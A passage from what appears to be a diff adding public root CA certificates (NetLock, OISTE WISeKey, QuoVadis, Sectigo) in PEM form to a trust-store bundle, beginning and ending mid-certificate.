+qo0hV4/GPnrK21HUUrPUloSlWGB/5QuOH/XcChWB5Tu2tyIvCZwTFrFsDDUIbatj +cu3cvuzHV+YwIHHW1xDBE1UBjCpD5EHxzzp6U5LOogMFDTjfArsQLtk70pt6wKGm ++LUx5vR1yblTmXVHIloUFcd4G7ad6Qz4G3bxhYTeodoS76TiEJd6eN4MUZeoIUCL +hr0N8F5OSza7OyAfikJW4Qsav3vQIkMsRIz75Sq0bBwcupTgE34h5prCy8VCZLQe +lHsIJchxzIdFV4XTnyliIoNRlwAYl3dqmJLJfGBs32x9SuRwTMKeuB330DTHD8z7 +p/8Dvq1wkNoL3chtl1+afwkyQf3NosxabUzyqkn+Zvjp2DXrDige7kgvOtB5CTh8 +piKCk5XQA76+AqAF3SAi428diDRgxuYKuQl1C/AH6GmWNcf7I4GOODm4RStDeKLR +LBT/DShycpWbXgnbiUSYqqFJu3FS8r/2/yehNq+4tneI3TqkbZs0kNwUXTC/t+sX +5Ie3cdCh13cV1ELX8vMxmV2b3RZtP+oGI/hGoiLtk/bdmuYqh7GYVPEi92tF4+KO +dh2ajcQGjTa3FPOdVGm3jjzVpG2Tgbet9r1ke8LJaDmgkpzNNIaRkPpkUZ3+/uul +9XXeifdy +-----END CERTIFICATE----- + +# NetLock Arany (Class Gold) Főtanúsítvány +-----BEGIN CERTIFICATE----- +MIIEFTCCAv2gAwIBAgIGSUEs5AAQMA0GCSqGSIb3DQEBCwUAMIGnMQswCQYDVQQG +EwJIVTERMA8GA1UEBwwIQnVkYXBlc3QxFTATBgNVBAoMDE5ldExvY2sgS2Z0LjE3 +MDUGA1UECwwuVGFuw7pzw610dsOhbnlraWFkw7NrIChDZXJ0aWZpY2F0aW9uIFNl +cnZpY2VzKTE1MDMGA1UEAwwsTmV0TG9jayBBcmFueSAoQ2xhc3MgR29sZCkgRsWR +dGFuw7pzw610dsOhbnkwHhcNMDgxMjExMTUwODIxWhcNMjgxMjA2MTUwODIxWjCB +pzELMAkGA1UEBhMCSFUxETAPBgNVBAcMCEJ1ZGFwZXN0MRUwEwYDVQQKDAxOZXRM +b2NrIEtmdC4xNzA1BgNVBAsMLlRhbsO6c8OtdHbDoW55a2lhZMOzayAoQ2VydGlm +aWNhdGlvbiBTZXJ2aWNlcykxNTAzBgNVBAMMLE5ldExvY2sgQXJhbnkgKENsYXNz +IEdvbGQpIEbFkXRhbsO6c8OtdHbDoW55MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A +MIIBCgKCAQEAxCRec75LbRTDofTjl5Bu0jBFHjzuZ9lk4BqKf8owyoPjIMHj9DrT +lF8afFttvzBPhCf2nx9JvMaZCpDyD/V/Q4Q3Y1GLeqVw/HpYzY6b7cNGbIRwXdrz +AZAj/E4wqX7hJ2Pn7WQ8oLjJM2P+FpD/sLj916jAwJRDC7bVWaaeVtAkH3B5r9s5 +VA1lddkVQZQBr17s9o3x/61k/iCa11zr/qYfCGSji3ZVrR47KGAuhyXoqq8fxmRG +ILdwfzzeSNuWU7c5d+Qa4scWhHaXWy+7GRWF+GmF9ZmnqfI0p6m2pgP8b4Y9VHx2 +BJtr+UBdADTHLpl1neWIA6pN+APSQnbAGwIDAKiLo0UwQzASBgNVHRMBAf8ECDAG +AQH/AgEEMA4GA1UdDwEB/wQEAwIBBjAdBgNVHQ4EFgQUzPpnk/C2uNClwB7zU/2M +U9+D15YwDQYJKoZIhvcNAQELBQADggEBAKt/7hwWqZw8UQCgwBEIBaeZ5m8BiFRh +bvG5GK1Krf6BQCOUL/t1fC8oS2IkgYIL9WHxHG64YTjrgfpioTtaYtOUZcTh5m2C ++C8lcLIhJsFyUR+MLMOEkMNaj7rP9KdlpeuY0fsFskZ1FSNqb4VjMIDw1Z4fKRzC +bLBQWV2QWzuoDTDPv31/zvGdg73JRm4gpvlhUbohL3u+pRVjodSVh/GeufOJ8z2F +uLjbvrW5KfnaNwUASZQDhETnv0Mxz3WLJdH0pmT1kvarBes96aULNmLazAZfNou2 +XjG4Kvte9nHfRCaexOYNkbQudZWAUWpLMKawYqGT8ZvYzsRjdT9ZR7E= +-----END CERTIFICATE----- + +# OISTE WISeKey Global Root GB CA +-----BEGIN CERTIFICATE----- +MIIDtTCCAp2gAwIBAgIQdrEgUnTwhYdGs/gjGvbCwDANBgkqhkiG9w0BAQsFADBt +MQswCQYDVQQGEwJDSDEQMA4GA1UEChMHV0lTZUtleTEiMCAGA1UECxMZT0lTVEUg +Rm91bmRhdGlvbiBFbmRvcnNlZDEoMCYGA1UEAxMfT0lTVEUgV0lTZUtleSBHbG9i +YWwgUm9vdCBHQiBDQTAeFw0xNDEyMDExNTAwMzJaFw0zOTEyMDExNTEwMzFaMG0x +CzAJBgNVBAYTAkNIMRAwDgYDVQQKEwdXSVNlS2V5MSIwIAYDVQQLExlPSVNURSBG +b3VuZGF0aW9uIEVuZG9yc2VkMSgwJgYDVQQDEx9PSVNURSBXSVNlS2V5IEdsb2Jh +bCBSb290IEdCIENBMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2Be3 +HEokKtaXscriHvt9OO+Y9bI5mE4nuBFde9IllIiCFSZqGzG7qFshISvYD06fWvGx +WuR51jIjK+FTzJlFXHtPrby/h0oLS5daqPZI7H17Dc0hBt+eFf1Biki3IPShehtX +1F1Q/7pn2COZH8g/497/b1t3sWtuuMlk9+HKQUYOKXHQuSP8yYFfTvdv37+ErXNk +u7dCjmn21HYdfp2nuFeKUWdy19SouJVUQHMD9ur06/4oQnc/nSMbsrY9gBQHTC5P +99UKFg29ZkM3fiNDecNAhvVMKdqOmq0NpQSHiB6F4+lT1ZvIiwNjeOvgGUpuuy9r +M2RYk61pv48b74JIxwIDAQABo1EwTzALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUw +AwEB/zAdBgNVHQ4EFgQUNQ/INmNe4qPs+TtmFc5RUuORmj0wEAYJKwYBBAGCNxUB +BAMCAQAwDQYJKoZIhvcNAQELBQADggEBAEBM+4eymYGQfp3FsLAmzYh7KzKNbrgh +cViXfa43FK8+5/ea4n32cZiZBKpDdHij40lhPnOMTZTg+XHEthYOU3gf1qKHLwI5 +gSk8rxWYITD+KJAAjNHhy/peyP34EEY7onhCkRd0VQreUGdNZtGn//3ZwLWoo4rO +ZvUPQ82nK1d7Y0Zqqi5S2PTt4W2tKZB4SLrhI6qjiey1q5bAtEuiHZeeevJuQHHf +aPFlTc58Bd9TZaml8LGXBHAVRgOY1NK/VLSgWH1Sb9pWJmLU2NuJMW8c8CLC02Ic +Nc1MaRVUGpCY3useX8p3x8uOPUNpnJpY0CQ73xtAln41rYHHTnG6iBM= +-----END CERTIFICATE----- + +# OISTE WISeKey Global Root GC CA +-----BEGIN CERTIFICATE----- +MIICaTCCAe+gAwIBAgIQISpWDK7aDKtARb8roi066jAKBggqhkjOPQQDAzBtMQsw +CQYDVQQGEwJDSDEQMA4GA1UEChMHV0lTZUtleTEiMCAGA1UECxMZT0lTVEUgRm91 +bmRhdGlvbiBFbmRvcnNlZDEoMCYGA1UEAxMfT0lTVEUgV0lTZUtleSBHbG9iYWwg +Um9vdCBHQyBDQTAeFw0xNzA1MDkwOTQ4MzRaFw00MjA1MDkwOTU4MzNaMG0xCzAJ +BgNVBAYTAkNIMRAwDgYDVQQKEwdXSVNlS2V5MSIwIAYDVQQLExlPSVNURSBGb3Vu +ZGF0aW9uIEVuZG9yc2VkMSgwJgYDVQQDEx9PSVNURSBXSVNlS2V5IEdsb2JhbCBS +b290IEdDIENBMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAETOlQwMYPchi82PG6s4ni +eUqjFqdrVCTbUf/q9Akkwwsin8tqJ4KBDdLArzHkdIJuyiXZjHWd8dvQmqJLIX4W +p2OQ0jnUsYd4XxiWD1AbNTcPasbc2RNNpI6QN+a9WzGRo1QwUjAOBgNVHQ8BAf8E +BAMCAQYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUSIcUrOPDnpBgOtfKie7T +rYy0UGYwEAYJKwYBBAGCNxUBBAMCAQAwCgYIKoZIzj0EAwMDaAAwZQIwJsdpW9zV +57LnyAyMjMPdeYwbY9XJUpROTYJKcx6ygISpJcBMWm1JKWB4E+J+SOtkAjEA2zQg +Mgj/mkkCtojeFK9dbJlxjRo/i9fgojaGHAeCOnZT/cKi7e97sIBPWA9LUzm9 +-----END CERTIFICATE----- + +# QuoVadis Root CA 1 G3 +-----BEGIN CERTIFICATE----- +MIIFYDCCA0igAwIBAgIUeFhfLq0sGUvjNwc1NBMotZbUZZMwDQYJKoZIhvcNAQEL +BQAwSDELMAkGA1UEBhMCQk0xGTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxHjAc +BgNVBAMTFVF1b1ZhZGlzIFJvb3QgQ0EgMSBHMzAeFw0xMjAxMTIxNzI3NDRaFw00 +MjAxMTIxNzI3NDRaMEgxCzAJBgNVBAYTAkJNMRkwFwYDVQQKExBRdW9WYWRpcyBM +aW1pdGVkMR4wHAYDVQQDExVRdW9WYWRpcyBSb290IENBIDEgRzMwggIiMA0GCSqG +SIb3DQEBAQUAA4ICDwAwggIKAoICAQCgvlAQjunybEC0BJyFuTHK3C3kEakEPBtV +wedYMB0ktMPvhd6MLOHBPd+C5k+tR4ds7FtJwUrVu4/sh6x/gpqG7D0DmVIB0jWe +rNrwU8lmPNSsAgHaJNM7qAJGr6Qc4/hzWHa39g6QDbXwz8z6+cZM5cOGMAqNF341 +68Xfuw6cwI2H44g4hWf6Pser4BOcBRiYz5P1sZK0/CPTz9XEJ0ngnjybCKOLXSoh +4Pw5qlPafX7PGglTvF0FBM+hSo+LdoINofjSxxR3W5A2B4GbPgb6Ul5jxaYA/qXp +UhtStZI5cgMJYr2wYBZupt0lwgNm3fME0UDiTouG9G/lg6AnhF4EwfWQvTA9xO+o +abw4m6SkltFi2mnAAZauy8RRNOoMqv8hjlmPSlzkYZqn0ukqeI1RPToV7qJZjqlc +3sX5kCLliEVx3ZGZbHqfPT2YfF72vhZooF6uCyP8Wg+qInYtyaEQHeTTRCOQiJ/G +KubX9ZqzWB4vMIkIG1SitZgj7Ah3HJVdYdHLiZxfokqRmu8hqkkWCKi9YSgxyXSt +hfbZxbGL0eUQMk1fiyA6PEkfM4VZDdvLCXVDaXP7a3F98N/ETH3Goy7IlXnLc6KO +Tk0k+17kBL5yG6YnLUlamXrXXAkgt3+UuU/xDRxeiEIbEbfnkduebPRq34wGmAOt +zCjvpUfzUwIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIB +BjAdBgNVHQ4EFgQUo5fW816iEOGrRZ88F2Q87gFwnMwwDQYJKoZIhvcNAQELBQAD +ggIBABj6W3X8PnrHX3fHyt/PX8MSxEBd1DKquGrX1RUVRpgjpeaQWxiZTOOtQqOC +MTaIzen7xASWSIsBx40Bz1szBpZGZnQdT+3Btrm0DWHMY37XLneMlhwqI2hrhVd2 +cDMT/uFPpiN3GPoajOi9ZcnPP/TJF9zrx7zABC4tRi9pZsMbj/7sPtPKlL92CiUN +qXsCHKnQO18LwIE6PWThv6ctTr1NxNgpxiIY0MWscgKCP6o6ojoilzHdCGPDdRS5 +YCgtW2jgFqlmgiNR9etT2DGbe+m3nUvriBbP+V04ikkwj+3x6xn0dxoxGE1nVGwv +b2X52z3sIexe9PSLymBlVNFxZPT5pqOBMzYzcfCkeF9OrYMh3jRJjehZrJ3ydlo2 +8hP0r+AJx2EqbPfgna67hkooby7utHnNkDPDs3b69fBsnQGQ+p6Q9pxyz0fawx/k +NSBT8lTR32GDpgLiJTjehTItXnOQUl1CxM49S+H5GYQd1aJQzEH7QRTDvdbJWqNj +ZgKAvQU6O0ec7AAmTPWIUb+oI38YB7AL7YsmoWTTYUrrXJ/es69nA7Mf3W1daWhp +q1467HxpvMc7hU6eFbm0FU/DlXpY18ls6Wy58yljXrQs8C097Vpl4KlbQMJImYFt +nh8GKjwStIsPm6Ik8KaN1nrgS7ZklmOVhMJKzRwuJIczYOXD +-----END CERTIFICATE----- + +# QuoVadis Root CA 2 +-----BEGIN CERTIFICATE----- +MIIFtzCCA5+gAwIBAgICBQkwDQYJKoZIhvcNAQEFBQAwRTELMAkGA1UEBhMCQk0x +GTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxGzAZBgNVBAMTElF1b1ZhZGlzIFJv +b3QgQ0EgMjAeFw0wNjExMjQxODI3MDBaFw0zMTExMjQxODIzMzNaMEUxCzAJBgNV +BAYTAkJNMRkwFwYDVQQKExBRdW9WYWRpcyBMaW1pdGVkMRswGQYDVQQDExJRdW9W +YWRpcyBSb290IENBIDIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCa +GMpLlA0ALa8DKYrwD4HIrkwZhR0In6spRIXzL4GtMh6QRr+jhiYaHv5+HBg6XJxg +Fyo6dIMzMH1hVBHL7avg5tKifvVrbxi3Cgst/ek+7wrGsxDp3MJGF/hd/aTa/55J +WpzmM+Yklvc/ulsrHHo1wtZn/qtmUIttKGAr79dgw8eTvI02kfN/+NsRE8Scd3bB +rrcCaoF6qUWD4gXmuVbBlDePSHFjIuwXZQeVikvfj8ZaCuWw419eaxGrDPmF60Tp ++ARz8un+XJiM9XOva7R+zdRcAitMOeGylZUtQofX1bOQQ7dsE/He3fbE+Ik/0XX1 +ksOR1YqI0JDs3G3eicJlcZaLDQP9nL9bFqyS2+r+eXyt66/3FsvbzSUr5R/7mp/i +Ucw6UwxI5g69ybR2BlLmEROFcmMDBOAENisgGQLodKcftslWZvB1JdxnwQ5hYIiz +PtGo/KPaHbDRsSNU30R2be1B2MGyIrZTHN81Hdyhdyox5C315eXbyOD/5YDXC2Og +/zOhD7osFRXql7PSorW+8oyWHhqPHWykYTe5hnMz15eWniN9gqRMgeKh0bpnX5UH +oycR7hYQe7xFSkyyBNKr79X9DFHOUGoIMfmR2gyPZFwDwzqLID9ujWc9Otb+fVuI +yV77zGHcizN300QyNQliBJIWENieJ0f7OyHj+OsdWwIDAQABo4GwMIGtMA8GA1Ud +EwEB/wQFMAMBAf8wCwYDVR0PBAQDAgEGMB0GA1UdDgQWBBQahGK8SEwzJQTU7tD2 +A8QZRtGUazBuBgNVHSMEZzBlgBQahGK8SEwzJQTU7tD2A8QZRtGUa6FJpEcwRTEL +MAkGA1UEBhMCQk0xGTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxGzAZBgNVBAMT +ElF1b1ZhZGlzIFJvb3QgQ0EgMoICBQkwDQYJKoZIhvcNAQEFBQADggIBAD4KFk2f +BluornFdLwUvZ+YTRYPENvbzwCYMDbVHZF34tHLJRqUDGCdViXh9duqWNIAXINzn +g/iN/Ae42l9NLmeyhP3ZRPx3UIHmfLTJDQtyU/h2BwdBR5YM++CCJpNVjP4iH2Bl +fF/nJrP3MpCYUNQ3cVX2kiF495V5+vgtJodmVjB3pjd4M1IQWK4/YY7yarHvGH5K +WWPKjaJW1acvvFYfzznB4vsKqBUsfU16Y8Zsl0Q80m/DShcK+JDSV6IZUaUtl0Ha +B0+pUNqQjZRG4T7wlP0QADj1O+hA4bRuVhogzG9Yje0uRY/W6ZM/57Es3zrWIozc +hLsib9D45MY56QSIPMO661V6bYCZJPVsAfv4l7CUW+v90m/xd2gNNWQjrLhVoQPR +TUIZ3Ph1WVaj+ahJefivDrkRoHy3au000LYmYjgahwz46P0u05B/B5EqHdZ+XIWD +mbA4CD/pXvk1B+TJYm5Xf6dQlfe6yJvmjqIBxdZmv3lh8zwc4bmCXF2gw+nYSL0Z +ohEUGW6yhhtoPkg3Goi3XZZenMfvJ2II4pEZXNLxId26F0KCl3GBUzGpn/Z9Yr9y +4aOTHcyKJloJONDO1w2AFrR4pTqHTI2KpdVGl/IsELm8VCLAAVBpQ570su9t+Oza +8eOx79+Rj1QqCyXBJhnEUhAFZdWCEOrCMc0u +-----END CERTIFICATE----- + +# QuoVadis Root CA 2 G3 +-----BEGIN CERTIFICATE----- +MIIFYDCCA0igAwIBAgIURFc0JFuBiZs18s64KztbpybwdSgwDQYJKoZIhvcNAQEL +BQAwSDELMAkGA1UEBhMCQk0xGTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxHjAc +BgNVBAMTFVF1b1ZhZGlzIFJvb3QgQ0EgMiBHMzAeFw0xMjAxMTIxODU5MzJaFw00 +MjAxMTIxODU5MzJaMEgxCzAJBgNVBAYTAkJNMRkwFwYDVQQKExBRdW9WYWRpcyBM +aW1pdGVkMR4wHAYDVQQDExVRdW9WYWRpcyBSb290IENBIDIgRzMwggIiMA0GCSqG +SIb3DQEBAQUAA4ICDwAwggIKAoICAQChriWyARjcV4g/Ruv5r+LrI3HimtFhZiFf +qq8nUeVuGxbULX1QsFN3vXg6YOJkApt8hpvWGo6t/x8Vf9WVHhLL5hSEBMHfNrMW +n4rjyduYNM7YMxcoRvynyfDStNVNCXJJ+fKH46nafaF9a7I6JaltUkSs+L5u+9ym +c5GQYaYDFCDy54ejiK2toIz/pgslUiXnFgHVy7g1gQyjO/Dh4fxaXc6AcW34Sas+ +O7q414AB+6XrW7PFXmAqMaCvN+ggOp+oMiwMzAkd056OXbxMmO7FGmh77FOm6RQ1 +o9/NgJ8MSPsc9PG/Srj61YxxSscfrf5BmrODXfKEVu+lV0POKa2Mq1W/xPtbAd0j +IaFYAI7D0GoT7RPjEiuA3GfmlbLNHiJuKvhB1PLKFAeNilUSxmn1uIZoL1NesNKq +IcGY5jDjZ1XHm26sGahVpkUG0CM62+tlXSoREfA7T8pt9DTEceT/AFr2XK4jYIVz +8eQQsSWu1ZK7E8EM4DnatDlXtas1qnIhO4M15zHfeiFuuDIIfR0ykRVKYnLP43eh +vNURG3YBZwjgQQvD6xVu+KQZ2aKrr+InUlYrAoosFCT5v0ICvybIxo/gbjh9Uy3l +7ZizlWNof/k19N+IxWA1ksB8aRxhlRbQ694Lrz4EEEVlWFA4r0jyWbYW8jwNkALG +cC4BrTwV1wIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIB +BjAdBgNVHQ4EFgQU7edvdlq/YOxJW8ald7tyFnGbxD0wDQYJKoZIhvcNAQELBQAD +ggIBAJHfgD9DCX5xwvfrs4iP4VGyvD11+ShdyLyZm3tdquXK4Qr36LLTn91nMX66 +AarHakE7kNQIXLJgapDwyM4DYvmL7ftuKtwGTTwpD4kWilhMSA/ohGHqPHKmd+RC +roijQ1h5fq7KpVMNqT1wvSAZYaRsOPxDMuHBR//47PERIjKWnML2W2mWeyAMQ0Ga +W/ZZGYjeVYg3UQt4XAoeo0L9x52ID8DyeAIkVJOviYeIyUqAHerQbj5hLja7NQ4n +lv1mNDthcnPxFlxHBlRJAHpYErAK74X9sbgzdWqTHBLmYF5vHX/JHyPLhGGfHoJE ++V+tYlUkmlKY7VHnoX6XOuYvHxHaU4AshZ6rNRDbIl9qxV6XU/IyAgkwo1jwDQHV +csaxfGl7w/U2Rcxhbl5MlMVerugOXou/983g7aEOGzPuVBj+D77vfoRrQ+NwmNtd +dbINWQeFFSM51vHfqSYP1kjHs6Yi9TM3WpVHn3u6GBVv/9YUZINJ0gpnIdsPNWNg +KCLjsZWDzYWm3S8P52dSbrsvhXz1SnPnxT7AvSESBT/8twNJAlvIJebiVDj1eYeM +HVOyToV7BjjHLPj4sHKNJeV3UvQDHEimUF+IIDBu8oJDqz2XhOdT+yHBTw8imoa4 +WSr2Rz0ZiC3oheGe7IUIarFsNMkd7EgrO3jtZsSOeWmD3n+M +-----END CERTIFICATE----- + +# QuoVadis Root CA 3 +-----BEGIN CERTIFICATE----- +MIIGnTCCBIWgAwIBAgICBcYwDQYJKoZIhvcNAQEFBQAwRTELMAkGA1UEBhMCQk0x +GTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxGzAZBgNVBAMTElF1b1ZhZGlzIFJv +b3QgQ0EgMzAeFw0wNjExMjQxOTExMjNaFw0zMTExMjQxOTA2NDRaMEUxCzAJBgNV +BAYTAkJNMRkwFwYDVQQKExBRdW9WYWRpcyBMaW1pdGVkMRswGQYDVQQDExJRdW9W +YWRpcyBSb290IENBIDMwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDM +V0IWVJzmmNPTTe7+7cefQzlKZbPoFog02w1ZkXTPkrgEQK0CSzGrvI2RaNggDhoB +4hp7Thdd4oq3P5kazethq8Jlph+3t723j/z9cI8LoGe+AaJZz3HmDyl2/7FWeUUr +H556VOijKTVopAFPD6QuN+8bv+OPEKhyq1hX51SGyMnzW9os2l2ObjyjPtr7guXd +8lyyBTNvijbO0BNO/79KDDRMpsMhvVAEVeuxu537RR5kFd5VAYwCdrXLoT9Cabwv +vWhDFlaJKjdhkf2mrk7AyxRllDdLkgbvBNDInIjbC3uBr7E9KsRlOni27tyAsdLT +mZw67mtaa7ONt9XOnMK+pUsvFrGeaDsGb659n/je7Mwpp5ijJUMv7/FfJuGITfhe +btfZFG4ZM2mnO4SJk8RTVROhUXhA+LjJou57ulJCg54U7QVSWllWp5f8nT8KKdjc +T5EOE7zelaTfi5m+rJsziO+1ga8bxiJTyPbH7pcUsMV8eFLI8M5ud2CEpukqdiDt +WAEXMJPpGovgc2PZapKUSU60rUqFxKMiMPwJ7Wgic6aIDFUhWMXhOp8q3crhkODZ +c6tsgLjoC2SToJyMGf+z0gzskSaHirOi4XCPLArlzW1oUevaPwV/izLmE1xr/l9A +4iLItLRkT9a6fUg+qGkM17uGcclzuD87nSVL2v9A6wIDAQABo4IBlTCCAZEwDwYD +VR0TAQH/BAUwAwEB/zCB4QYDVR0gBIHZMIHWMIHTBgkrBgEEAb5YAAMwgcUwgZMG +CCsGAQUFBwICMIGGGoGDQW55IHVzZSBvZiB0aGlzIENlcnRpZmljYXRlIGNvbnN0 +aXR1dGVzIGFjY2VwdGFuY2Ugb2YgdGhlIFF1b1ZhZGlzIFJvb3QgQ0EgMyBDZXJ0 +aWZpY2F0ZSBQb2xpY3kgLyBDZXJ0aWZpY2F0aW9uIFByYWN0aWNlIFN0YXRlbWVu +dC4wLQYIKwYBBQUHAgEWIWh0dHA6Ly93d3cucXVvdmFkaXNnbG9iYWwuY29tL2Nw +czALBgNVHQ8EBAMCAQYwHQYDVR0OBBYEFPLAE+CCQz777i9nMpY1XNu4ywLQMG4G +A1UdIwRnMGWAFPLAE+CCQz777i9nMpY1XNu4ywLQoUmkRzBFMQswCQYDVQQGEwJC +TTEZMBcGA1UEChMQUXVvVmFkaXMgTGltaXRlZDEbMBkGA1UEAxMSUXVvVmFkaXMg +Um9vdCBDQSAzggIFxjANBgkqhkiG9w0BAQUFAAOCAgEAT62gLEz6wPJv92ZVqyM0 +7ucp2sNbtrCD2dDQ4iH782CnO11gUyeim/YIIirnv6By5ZwkajGxkHon24QRiSem +d1o417+shvzuXYO8BsbRd2sPbSQvS3pspweWyuOEn62Iix2rFo1bZhfZFvSLgNLd ++LJ2w/w4E6oM3kJpK27zPOuAJ9v1pkQNn1pVWQvVDVJIxa6f8i+AxeoyUDUSly7B +4f/xI4hROJ/yZlZ25w9Rl6VSDE1JUZU2Pb+iSwwQHYaZTKrzchGT5Or2m9qoXadN +t54CrnMAyNojA+j56hl0YgCUyyIgvpSnWbWCar6ZeXqp8kokUvd0/bpO5qgdAm6x +DYBEwa7TIzdfu4V8K5Iu6H6li92Z4b8nby1dqnuH/grdS/yO9SbkbnBCbjPsMZ57 +k8HkyWkaPcBrTiJt7qtYTcbQQcEr6k8Sh17rRdhs9ZgC06DYVYoGmRmioHfRMJ6s +zHXug/WwYjnPbFfiTNKRCw51KBuav/0aQ/HKd/s7j2G4aSgWQgRecCocIdiP4b0j +Wy10QJLZYxkNc91pvGJHvOB0K7Lrfb5BG7XARsWhIstfTsEokt4YutUqKLsRixeT +mJlglFwjz1onl14LBQaTNx47aTbrqZ5hHY8y2o4M1nQ+ewkk2gF3R8Q7zTSMmfXK +4SVhM7JZG+Ju1zdXtg2pEto= +-----END CERTIFICATE----- + +# QuoVadis Root CA 3 G3 +-----BEGIN CERTIFICATE----- +MIIFYDCCA0igAwIBAgIULvWbAiin23r/1aOp7r0DoM8Sah0wDQYJKoZIhvcNAQEL +BQAwSDELMAkGA1UEBhMCQk0xGTAXBgNVBAoTEFF1b1ZhZGlzIExpbWl0ZWQxHjAc +BgNVBAMTFVF1b1ZhZGlzIFJvb3QgQ0EgMyBHMzAeFw0xMjAxMTIyMDI2MzJaFw00 +MjAxMTIyMDI2MzJaMEgxCzAJBgNVBAYTAkJNMRkwFwYDVQQKExBRdW9WYWRpcyBM +aW1pdGVkMR4wHAYDVQQDExVRdW9WYWRpcyBSb290IENBIDMgRzMwggIiMA0GCSqG +SIb3DQEBAQUAA4ICDwAwggIKAoICAQCzyw4QZ47qFJenMioKVjZ/aEzHs286IxSR +/xl/pcqs7rN2nXrpixurazHb+gtTTK/FpRp5PIpM/6zfJd5O2YIyC0TeytuMrKNu +FoM7pmRLMon7FhY4futD4tN0SsJiCnMK3UmzV9KwCoWdcTzeo8vAMvMBOSBDGzXR +U7Ox7sWTaYI+FrUoRqHe6okJ7UO4BUaKhvVZR74bbwEhELn9qdIoyhA5CcoTNs+c +ra1AdHkrAj80//ogaX3T7mH1urPnMNA3I4ZyYUUpSFlob3emLoG+B01vr87ERROR +FHAGjx+f+IdpsQ7vw4kZ6+ocYfx6bIrc1gMLnia6Et3UVDmrJqMz6nWB2i3ND0/k +A9HvFZcba5DFApCTZgIhsUfei5pKgLlVj7WiL8DWM2fafsSntARE60f75li59wzw +eyuxwHApw0BiLTtIadwjPEjrewl5qW3aqDCYz4ByA4imW0aucnl8CAMhZa634Ryl +sSqiMd5mBPfAdOhx3v89WcyWJhKLhZVXGqtrdQtEPREoPHtht+KPZ0/l7DxMYIBp +VzgeAVuNVejH38DMdyM0SXV89pgR6y3e7UEuFAUCf+D+IOs15xGsIs5XPd7JMG0Q +A4XN8f+MFrXBsj6IbGB/kE+V9/YtrQE5BwT6dYB9v0lQ7e/JxHwc64B+27bQ3RP+ +ydOc17KXqQIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1UdDwEB/wQEAwIB +BjAdBgNVHQ4EFgQUxhfQvKjqAkPyGwaZXSuQILnXnOQwDQYJKoZIhvcNAQELBQAD +ggIBADRh2Va1EodVTd2jNTFGu6QHcrxfYWLopfsLN7E8trP6KZ1/AvWkyaiTt3px +KGmPc+FSkNrVvjrlt3ZqVoAh313m6Tqe5T72omnHKgqwGEfcIHB9UqM+WXzBusnI +FUBhynLWcKzSt/Ac5IYp8M7vaGPQtSCKFWGafoaYtMnCdvvMujAWzKNhxnQT5Wvv +oxXqA/4Ti2Tk08HS6IT7SdEQTXlm66r99I0xHnAUrdzeZxNMgRVhvLfZkXdxGYFg +u/BYpbWcC/ePIlUnwEsBbTuZDdQdm2NnL9DuDcpmvJRPpq3t/O5jrFc/ZSXPsoaP +0Aj/uHYUbt7lJ+yreLVTubY/6CD50qi+YUbKh4yE8/nxoGibIh6BJpsQBJFxwAYf +3KDTuVan45gtf4Od34wrnDKOMpTwATwiKp9Dwi7DmDkHOHv8XgBCH/MyJnmDhPbl +8MFREsALHgQjDFSlTC9JxUrRtm5gDWv8a4uFJGS3iQ6rJUdbPM9+Sb3H6QrG2vd+ +DhcI00iX0HGS8A85PjRqHH3Y8iKuu2n0M7SmSFXRDw4m6Oy2Cy2nhTXN/VnIn9HN +PlopNLk9hM6xZdRZkZFWdSHBd575euFgndOtBBj0fOtek49TSiIp+EgrPk2GrFt/ +ywaZWWDYWGWVjUTR939+J399roD1B0y2PpxxVJkES/1Y+Zj0 +-----END CERTIFICATE----- + +# Sectigo Public Server Authentication Root E46 +-----BEGIN CERTIFICATE----- +MIICOjCCAcGgAwIBAgIQQvLM2htpN0RfFf51KBC49DAKBggqhkjOPQQDAzBfMQsw +CQYDVQQGEwJHQjEYMBYGA1UEChMPU2VjdGlnbyBMaW1pdGVkMTYwNAYDVQQDEy1T +ZWN0aWdvIFB1YmxpYyBTZXJ2ZXIgQXV0aGVudGljYXRpb24gUm9vdCBFNDYwHhcN +MjEwMzIyMDAwMDAwWhcNNDYwMzIxMjM1OTU5WjBfMQswCQYDVQQGEwJHQjEYMBYG +A1UEChMPU2VjdGlnbyBMaW1pdGVkMTYwNAYDVQQDEy1TZWN0aWdvIFB1YmxpYyBT +ZXJ2ZXIgQXV0aGVudGljYXRpb24gUm9vdCBFNDYwdjAQBgcqhkjOPQIBBgUrgQQA +IgNiAAR2+pmpbiDt+dd34wc7qNs9Xzjoq1WmVk/WSOrsfy2qw7LFeeyZYX8QeccC +WvkEN/U0NSt3zn8gj1KjAIns1aeibVvjS5KToID1AZTc8GgHHs3u/iVStSBDHBv+ +6xnOQ6OjQjBAMB0GA1UdDgQWBBTRItpMWfFLXyY4qp3W7usNw/upYTAOBgNVHQ8B +Af8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAKBggqhkjOPQQDAwNnADBkAjAn7qRa +qCG76UeXlImldCBteU/IvZNeWBj7LRoAasm4PdCkT0RHlAFWovgzJQxC36oCMB3q +4S6ILuH5px0CMk7yn2xVdOOurvulGu7t0vzCAxHrRVxgED1cf5kDW21USAGKcw== +-----END CERTIFICATE----- + +# Sectigo Public Server Authentication Root R46 +-----BEGIN CERTIFICATE----- +MIIFijCCA3KgAwIBAgIQdY39i658BwD6qSWn4cetFDANBgkqhkiG9w0BAQwFADBf +MQswCQYDVQQGEwJHQjEYMBYGA1UEChMPU2VjdGlnbyBMaW1pdGVkMTYwNAYDVQQD 